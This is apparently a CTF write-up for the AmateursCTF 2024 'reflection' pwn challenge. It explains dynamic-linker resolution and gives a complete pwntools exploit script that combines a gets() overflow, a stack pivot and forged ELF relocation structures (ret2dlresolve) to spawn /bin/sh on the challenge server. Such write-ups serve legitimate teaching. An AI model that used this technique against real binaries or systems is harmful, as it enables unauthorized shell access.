AmateursCTF2024/pwn/reflection

# pwn/reflection

Here is the challenge source code:

```c
#include <stdio.h>

int main() {
    char buf[13];
    gets(buf);
}
```

Clearly, the use of `gets` gives us a stack buffer overflow. Running checksec, we get

```shell
$ checksec --file=chal
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   RW-RUNPATH   20 Symbols      No      0               1               chal
```

showing that both the stack canary and PIE are disabled. That means we can easily redirect control flow to anywhere within the binary via return-oriented programming.

Ideally, we would redirect control flow into libc and invoke `system('/bin/sh')`. However, the problem is that we cannot leak any libc address, since the program only performs a single buffer write and never prints anything. The trick we will use to overcome this is ret2dlresolve.

To understand the trick, we first have to understand how dynamic linking on Linux works. For that, I recommend reading this article, [Understanding _dl_runtime_resolve()](https://ypl.coffee/dl-resolve/), which gets into the nitty-gritty details of how the dynamic linker locates the different structures. Alternatively, you can read on for my explanation.

## _dl_runtime_resolve()

Whenever a function from a shared library is called, like the `gets` function from libc in our case, we actually first call into the PLT stub `gets@plt`:

```
0000000000401030 <gets@plt>:
  401030:       ff 25 ca 2f 00 00       jmp    *0x2fca(%rip)        # 404000 <gets@GLIBC_2.2.5>
  401036:       68 00 00 00 00          push   $0x0
  40103b:       e9 e0 ff ff ff          jmp    401020 <_init+0x20>
```

This performs an indirect jump to an address loaded from the global offset table (GOT) entry for `gets`. Initially, the address stored in that GOT entry is 0x401036, which is the instruction immediately after the jump. In the next instruction, `reloc_index`, which in our case is 0x0, is pushed onto the stack.
This acts as an argument to the dynamic linker that tells it which function we would like to resolve. It has to be passed on the stack because the registers may already hold the arguments for the actual function call. We then jump to 0x401020:

```
0000000000401020 <gets@plt-0x10>:
  401020:       ff 35 ca 2f 00 00       push   0x2fca(%rip)        # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
  401026:       ff 25 cc 2f 00 00       jmp    *0x2fcc(%rip)        # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
  40102c:       0f 1f 40 00             nopl   0x0(%rax)
```

This first pushes the value loaded from `_GLOBAL_OFFSET_TABLE_[1]` onto the stack, which is the `link_map` argument for the dynamic linker. Then we perform an indirect jump to the address stored in `_GLOBAL_OFFSET_TABLE_[2]`, which points to the actual `_dl_runtime_resolve()` function of the dynamic linker.

The dynamic linker then resolves the function we want to call based on the `reloc_index` and `link_map` arguments we have provided. The address of the resolved function is stored back into the global offset table so that we do not have to go through the same process again the next time we call the same function.

The important thing to understand is how the linker figures out which function we want to resolve. This is a three-step process:

1. `reloc_index` is used to index into an array of `Elf64_Rela` structs whose base address is found in the `DT_JMPREL` tag in the dynamic section.

   ```c
   typedef struct
   {
     Elf64_Addr    r_offset;   /* Address */
     Elf64_Xword   r_info;     /* Relocation type and symbol index */
     Elf64_Sxword  r_addend;   /* Addend */
   } Elf64_Rela;
   ```

   We can extract the relocation type and symbol index from the `r_info` field with the following macros, which can be found in /usr/include/elf.h:

   ```c
   #define ELF64_R_SYM(i)   ((i) >> 32)
   #define ELF64_R_TYPE(i)  ((i) & 0xffffffff)
   ```

   Our relocation type is 7, which is `R_X86_64_JUMP_SLOT`.
   Since this is a relocation for a global offset table entry, `r_offset` holds the address of that entry, which in our case is 0x404000. We set `r_addend` to zero since it is unused for our relocation type.

2. The symbol index we get from the `Elf64_Rela` struct is then used to index into an array of `Elf64_Sym` structs whose base address is found in the `DT_SYMTAB` tag in the dynamic section.

   ```c
   typedef struct
   {
     Elf64_Word    st_name;    /* Symbol name (string tbl index) */
     unsigned char st_info;    /* Symbol type and binding */
     unsigned char st_other;   /* Symbol visibility */
     Elf64_Section st_shndx;   /* Section index */
     Elf64_Addr    st_value;   /* Symbol value */
     Elf64_Xword   st_size;    /* Symbol size */
   } Elf64_Sym;
   ```

   Again, we can extract the symbol type and binding from the `st_info` field with the following macros, which can be found in /usr/include/elf.h:

   ```c
   #define ELF32_ST_BIND(val)  (((unsigned char) (val)) >> 4)
   #define ELF32_ST_TYPE(val)  ((val) & 0xf)
   #define ELF64_ST_BIND(val)  ELF32_ST_BIND (val)
   #define ELF64_ST_TYPE(val)  ELF32_ST_TYPE (val)
   ```

   Our symbol type is 2, which is `STT_FUNC`, and our symbol binding is 1, which is `STB_GLOBAL`. This means that the symbol we are looking at refers to a function with global binding, so `st_info` is `(1 << 4) | 2 = 0x12`. We set both `st_value` and `st_size` to 0 since we do not have a definition of the symbol and we want the dynamic linker to search for it in other shared libraries.

3. The `st_name` field of the `Elf64_Sym` struct from the previous step is used as a byte offset into the string table, whose base address, as you may have guessed, comes from the `DT_STRTAB` tag in the dynamic section. This points to a null-terminated string which tells the dynamic linker the name of the symbol we want to resolve.

**NOTE** You can get the values of the tags in the dynamic section by running

```shell
$ readelf -d chal
```

## Exploit

We want to trick the dynamic linker into resolving the `system` function in libc for us.
Our plan is to craft all the relevant data structures at some known address and trick the dynamic linker into using them by carefully controlling the `reloc_index` passed on the stack, the symbol index stored in the `Elf64_Rela` struct, and the `st_name` field in the `Elf64_Sym` struct. This means that we need an arbitrary-write primitive.

However, the immediate difficulty is that while we can ROP to `gets`, there are no gadgets that let us easily set the `rdi` register, which is necessary to pass `gets` the address of the buffer we want to write to. Upon closer inspection, we see the following snippet of assembly code in `main`:

```
  40112e:       48 8d 45 f3             lea    -0xd(%rbp),%rax
  401132:       48 89 c7                mov    %rax,%rdi
  401135:       b8 00 00 00 00          mov    $0x0,%eax
  40113a:       e8 f1 fe ff ff          call   401030 <gets@plt>
  40113f:       b8 00 00 00 00          mov    $0x0,%eax
  401144:       c9                      leave
  401145:       c3                      ret
```

The value `rbp-0xd` is first loaded into `rax` and then moved to `rdi` before calling `gets`. This means that by controlling `rbp`, we control `rdi` and hence the first argument to `gets`.

The question is how we can set `rbp`. It turns out that directly before the saved return address we overwrite while doing ROP (that is, at the next lower address), there is also a saved `rbp` value, which is restored by the `leave` instruction before `ret`. Our overflow overwrites both.

The only remaining problem is where to put the relevant data structures for the dynamic linker.
This is the result of running `vmmap` with gef while debugging the program:

```
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x0000000000401000 0x0000000000001000 r-- /home/kali/CTF/Amateurs/reflection/reflection/chal
0x0000000000401000 0x0000000000402000 0x0000000000001000 r-x /home/kali/CTF/Amateurs/reflection/reflection/chal
0x0000000000402000 0x0000000000403000 0x0000000000001000 r-- /home/kali/CTF/Amateurs/reflection/reflection/chal
0x0000000000403000 0x0000000000405000 0x0000000000002000 rw- /home/kali/CTF/Amateurs/reflection/reflection/chal
0x00007ffff7fbd000 0x00007ffff7fc1000 0x0000000000004000 r-- [vvar]
0x00007ffff7fc1000 0x00007ffff7fc3000 0x0000000000002000 r-x [vdso]
0x00007ffff7fc3000 0x00007ffff7fc5000 0x0000000000002000 r-- /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2
0x00007ffff7fc5000 0x00007ffff7fef000 0x000000000002a000 r-x /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2
0x00007ffff7fef000 0x00007ffff7ffa000 0x000000000000b000 r-- /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2
0x00007ffff7ffb000 0x00007ffff7fff000 0x0000000000004000 rw- /home/kali/CTF/Amateurs/reflection/reflection/lib/ld-linux-x86-64.so.2
0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 rw- [stack]
gef➤
```

As we can see, the region from `0x403000` to `0x405000` is usable, as it is both readable and writable and sits at a fixed address (no PIE), so we pick an address there.

Hence, this is the general flow of our exploit:

1. In the first ROP chain
   1. Control the saved `rbp` so that it points into our selected buffer.
   2. Return to 0x40112e inside `main`.
      1. This calls `gets` on our selected buffer, so that we can write all the relevant data structures to it.
      2. The sequence `leave; ret` is then executed, which performs a stack migration: `rsp` now points into our new buffer, at the address held in `rbp`. This is because the `leave` instruction is a shorter encoding of `mov rsp, rbp; pop rbp` (Intel syntax).
         This means that we need to leave some space in our selected buffer for the second ROP chain.
2. In the second ROP chain
   1. Control `rbp` so that `rbp-0xd` points to a "/bin/sh" string, which we also place somewhere in our selected buffer.
   2. Return to 0x401020 with the correct `reloc_index` on the stack.
      1. This (re-)resolves the `gets` entry in the global offset table to the `system` function.
      2. Note that this also calls `system` once, with the first argument set to some bogus libc address, namely whatever `rdi` happens to hold after the previous `gets` call. This does not matter as long as `rdi` points to some valid string in memory and we do not get a segmentation fault.
   3. Return to 0x40112e, which calls `gets@plt` with `rbp-0xd` as its argument. Since the GOT entry has been hijacked, this is effectively `system('/bin/sh')`.

## Tuning, Tuning, Tuning

The layout near our selected buffer looks like this:

| Content                 | Address |
| ----------------------- | ------- |
| Our data structures     | High    |
| Second ROP chain        |         |
| Reserved for call stack | Low     |

The controlled `rbp` value in the first ROP chain is supposed to point to the boundary between the second ROP chain and the space reserved for the call stack. If we set `rbp` too low, we do not reserve enough space for the call stack, as it would run into the read-only mapping below. If we set `rbp` too high, we no longer have sufficient space above it for our data structures.

As far as I am aware, this is one of the reasons why some people's exploits worked locally but not remotely: the amount of space that needs to be reserved for the call stack may differ from machine to machine. (Maybe somebody knows why?)
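The layout above follows from how `leave; ret` moves `rsp`. As a minimal sketch (not part of the exploit itself), the following models the pivot on a byte string that stands in for the writable region. The helper name `leave_ret` is hypothetical, and the concrete addresses are illustrative values consistent with `TUNING = 150` in the script further down.

```python
import struct


def leave_ret(memory: bytes, memory_base: int, rbp: int):
    """Model `leave; ret` and return (new_rbp, new_rip, new_rsp).

    `memory` is a snapshot of bytes starting at address `memory_base`.
    """
    def read_u64(addr: int) -> int:
        return struct.unpack_from("<Q", memory, addr - memory_base)[0]

    rsp = rbp                 # leave, part 1: mov rsp, rbp
    new_rbp = read_u64(rsp)   # leave, part 2: pop rbp
    rsp += 8
    new_rip = read_u64(rsp)   # ret: pop rip
    rsp += 8
    return new_rbp, new_rip, rsp


# Illustrative values: rbp was pivoted to PIVOT by the first chain,
# and gets() wrote our second payload starting at rbp - 0xd.
PIVOT = 0x404F10
write_addr = PIVOT - 0xD

second_payload = b"A" * 13               # fills [rbp-0xd, rbp)
second_payload += struct.pack("<Q", 0x404F75)  # lands at [rbp]: next rbp
second_payload += struct.pack("<Q", 0x401020)  # lands at [rbp+8]: return address

new_rbp, new_rip, new_rsp = leave_ret(second_payload, write_addr, PIVOT)
print(hex(new_rbp), hex(new_rip), hex(new_rsp))
```

After the pivot, `rsp` sits 16 bytes above the chosen `rbp`, so the rest of the second ROP chain and the data structures grow upward from there, while everything below is consumed as stack by the functions called afterwards.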
## TLDR

Stack migration for arbitrary write to craft data structures for ret2dlresolve.

## Code

```python
#!/usr/bin/env python3

from pwn import *

TUNING = 150

#########
# Setup #
#########

context.log_level = "DEBUG"
context.binary = binary = "./chal_patched"
context.terminal = ["tmux", "split", "-h"]

e = ELF(binary)

if args.LOCAL:
    c = gdb.debug(binary)
    #c = remote("localhost", 5000)
else:
    c = remote("chal.amt.rs", 1344)

##################
# Stack Pivoting #
##################

# New rbp value inside the writable region 0x403000-0x405000
BASE = 0x404100 + 0x18 * TUNING

payload = b""
payload += b"A" * 13        # fill buf[13]
payload += p64(BASE)        # saved rbp
payload += p64(0x40112e)    # return into main: lea -0xd(%rbp),%rax; ...; call gets
payload += b"\n"

c.send(payload)

#########
# Utils #
#########

def get_padding(base : int, alignment : int, address : int) -> bytes:
    """Padding needed so that (address - base) is a multiple of alignment."""
    r = (address - base) % alignment
    if r == 0:
        return b""
    else:
        return b"A" * (alignment - r)

############################
# Values for ret2dlresolve #
############################

dynstr_section = 0x400470
dynsym_section = 0x4003e0
jmprel_section = 0x400590

# Yes. I am indeed tuning these parameters manually
# by checking where the assertion below fails.
# Sue me.
predict_bin_sh_str = 0x4048d8 + 0x18 * (TUNING - 80)
dynstr_offset = 0x3ca8 + 9 * 8 + 0x18 * TUNING
dynsym_index = 654 + 3 + TUNING
jmprel_index = 637 + 3 + TUNING

print(f"dynstr_section = {hex(dynstr_section)}")
print(f"dynsym_section = {hex(dynsym_section)}")
print(f"jmprel_section = {hex(jmprel_section)}")

########################
# Actual ret2dlresolve #
########################

# gets() writes to BASE - 13, so payload byte i lands at BASE + i - 13
payload = b"A" * 13

# ROP chain
payload += p64(predict_bin_sh_str + 13)  # new rbp, so that rbp-0xd == "/bin/sh"
payload += p64(0x401020)                 # PLT0: push link_map; jmp resolver
payload += p64(jmprel_index)             # reloc_index
payload += p64(0x40112e)                 # call gets@plt, which is now system
payload += p64(0x0) * 7

# "/bin/sh"
bin_sh_str = BASE + len(payload) - 13
payload += b"/bin/sh\0"

# "system"
dynstr = BASE + len(payload) - 13
payload += b"system\0"

# dynsym => Elf64_Sym
payload += get_padding(dynsym_section, 0x18, BASE + len(payload) - 13)
dynsym = BASE + len(payload) - 13
payload += p32(dynstr_offset) # st_name
payload += p8(0x12)           # st_info => STB_GLOBAL, STT_FUNC
payload += p8(0x0)            # st_other
payload += p16(0x0)           # st_shndx
payload += p64(0x0)           # st_value
payload += p64(0x0)           # st_size

# jmprel => Elf64_Rela
payload += get_padding(jmprel_section, 0x18, BASE + len(payload) - 13)
jmprel = BASE + len(payload) - 13
payload += p64(e.got["gets"])               # r_offset
payload += p64((dynsym_index << 32) | 0x7)  # r_info => 0x7 means relocation type R_X86_64_JUMP_SLOT
payload += p64(0x0)                         # r_addend

payload += b"\n"

print(f"bin_sh_str at {hex(bin_sh_str)}")
print(f"dynstr at {hex(dynstr)}")
print(f"dynsym at {hex(dynsym)}")
print(f"jmprel at {hex(jmprel)}")

# If an assertion fails, change predict_bin_sh_str, dynstr_offset,
# dynsym_index and jmprel_index accordingly so that it does not fail.
assert predict_bin_sh_str == bin_sh_str
assert dynstr == dynstr_section + dynstr_offset
assert dynsym == dynsym_section + 0x18 * dynsym_index
assert jmprel == jmprel_section + 0x18 * jmprel_index

c.send(payload)

###########
# Finally #
###########

c.interactive()
```

You may need to adjust the `TUNING` parameter.
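The hand-tuned constants in the script could, in principle, be derived from the addresses where the fake structures end up. The following is a rough sketch of that idea, not the code used during the CTF. The helper names `align_up` and `dlresolve_indices` are hypothetical. The section base addresses are the ones from the script above, and the example addresses are the ones the script produces with `TUNING = 150`.

```python
ENTRY_SIZE = 0x18  # sizeof(Elf64_Sym) == sizeof(Elf64_Rela) == 24 on x86-64

# Section base addresses taken from the exploit script above
DYNSTR = 0x400470
DYNSYM = 0x4003E0
JMPREL = 0x400590


def align_up(base: int, size: int, addr: int) -> int:
    """Smallest address >= addr such that (address - base) is a multiple of size."""
    r = (addr - base) % size
    return addr if r == 0 else addr + (size - r)


def dlresolve_indices(name_addr: int, sym_addr: int, rela_addr: int):
    """Return (st_name offset, symbol index, reloc_index) for fake structures
    placed at the given addresses. The fake Elf64_Sym and Elf64_Rela must be
    entry-aligned relative to their section base."""
    assert (sym_addr - DYNSYM) % ENTRY_SIZE == 0, "fake Elf64_Sym misaligned"
    assert (rela_addr - JMPREL) % ENTRY_SIZE == 0, "fake Elf64_Rela misaligned"
    st_name = name_addr - DYNSTR
    sym_index = (sym_addr - DYNSYM) // ENTRY_SIZE
    reloc_index = (rela_addr - JMPREL) // ENTRY_SIZE
    return st_name, sym_index, reloc_index


# Addresses as laid out by the script with TUNING = 150
name_addr = 0x404F70                                    # "system\0"
sym_addr = align_up(DYNSYM, ENTRY_SIZE, name_addr + 7)  # after the 7-byte string
rela_addr = align_up(JMPREL, ENTRY_SIZE, sym_addr + ENTRY_SIZE)

st_name, sym_index, reloc_index = dlresolve_indices(name_addr, sym_addr, rela_addr)
print(hex(st_name), sym_index, reloc_index)
```

These values agree with `dynstr_offset`, `dynsym_index` and `jmprel_index` in the script for `TUNING = 150`. Note that `reloc_index` still has to be known before the ROP chain is emitted, so in practice the layout would be computed first and the payload assembled afterwards.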